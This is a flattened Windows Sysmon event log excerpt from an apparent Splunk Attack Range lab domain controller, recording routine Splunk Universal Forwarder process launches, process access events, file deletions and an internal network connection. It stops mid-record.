10341000x80000000000000001696749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:09.505{05ADC7E1-70CD-603D-6A88-00000000AD01}45923552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:09.317{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-70CD-603D-6A88-00000000AD01}4592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:09.317{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:09.317{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:09.317{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:09.317{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:09.317{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-70CD-603D-6A88-00000000AD01}4592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001696742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:09.317{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-70CD-603D-6A88-00000000AD01}4592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001696741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:09.319{05ADC7E1-70CD-603D-6A88-00000000AD01}4592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001696753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:10.989{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FC1672066970438A0FA75BD7E42FAF8,SHA256=7DC07CDD8D32C4EF828572E8871FE1433E81C8AF72699AEDCAD96395723C0615,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:02.468{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55154-false10.0.1.12-8000- 23542300x80000000000000001696751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:10.168{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A669A3DAAAF7AF6D9CB2B077CAD6D745,SHA256=2FBD9F4DB58D120FAED2C74A081DD2963E6F8181CF1707D62E59E6FDE0A43BDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:11.989{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81C7B1C40078C2FC35937942B757D515,SHA256=CD8CB52801B7E15297EF8B7DF2C811EF5529D6F94415374B831A7F5AB4BC8A0D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001696772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.873{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-70D0-603D-6C88-00000000AD01}4504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.870{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.870{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.870{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.870{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.870{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-70D0-603D-6C88-00000000AD01}4504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001696766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.869{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-70D0-603D-6C88-00000000AD01}4504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001696765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.866{05ADC7E1-70D0-603D-6C88-00000000AD01}4504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001696764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.411{05ADC7E1-70D0-603D-6B88-00000000AD01}78726516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.224{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-70D0-603D-6B88-00000000AD01}7872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.224{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.224{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.224{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.224{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.224{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-70D0-603D-6B88-00000000AD01}7872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001696757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.224{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-70D0-603D-6B88-00000000AD01}7872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001696756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.225{05ADC7E1-70D0-603D-6B88-00000000AD01}7872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001696755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.005{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 